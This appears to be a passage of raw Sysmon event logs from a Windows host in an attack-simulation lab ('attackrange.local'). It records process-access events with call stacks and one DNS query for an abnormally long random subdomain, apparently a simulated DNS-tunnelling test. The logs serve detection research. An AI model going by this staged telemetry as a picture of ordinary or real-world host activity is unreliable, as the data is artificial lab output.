Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000018509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+3287301|C:\Program Files\Mozilla Firefox\xul.dll+328a801|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000018508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.001{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.001{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.000{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc 10341000x800000000000000018505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.000{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000018504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:25.000{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000018503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.999{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+3287301|C:\Program Files\Mozilla Firefox\xul.dll+328a801|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 22542200x800000000000000018526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:24.876{59A5CD1D-945A-6005-3305-00000000A301}7052dsafdasfsadfdasdfasdfasdfasdfasfdasadfasfaasdfasdfasdasfdasdfsadfsafasffasdasdfasddafasfdasfasddafasdfasfasdafdasasdfdasd.google.com123-C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9504-6005-4D05-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9504-6005-4D05-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.528{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9504-6005-4D05-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:44.529{59A5CD1D-9504-6005-4D05-00000000A301}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.544{59A5CD1D-9505-6005-4E05-00000000A301}67445872C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.391{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9505-6005-4E05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.390{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.389{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.389{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.389{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.389{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9505-6005-4E05-00000000A301}6744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:45.389{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9505-6005-4E05-00000000A301}6744C:\Program 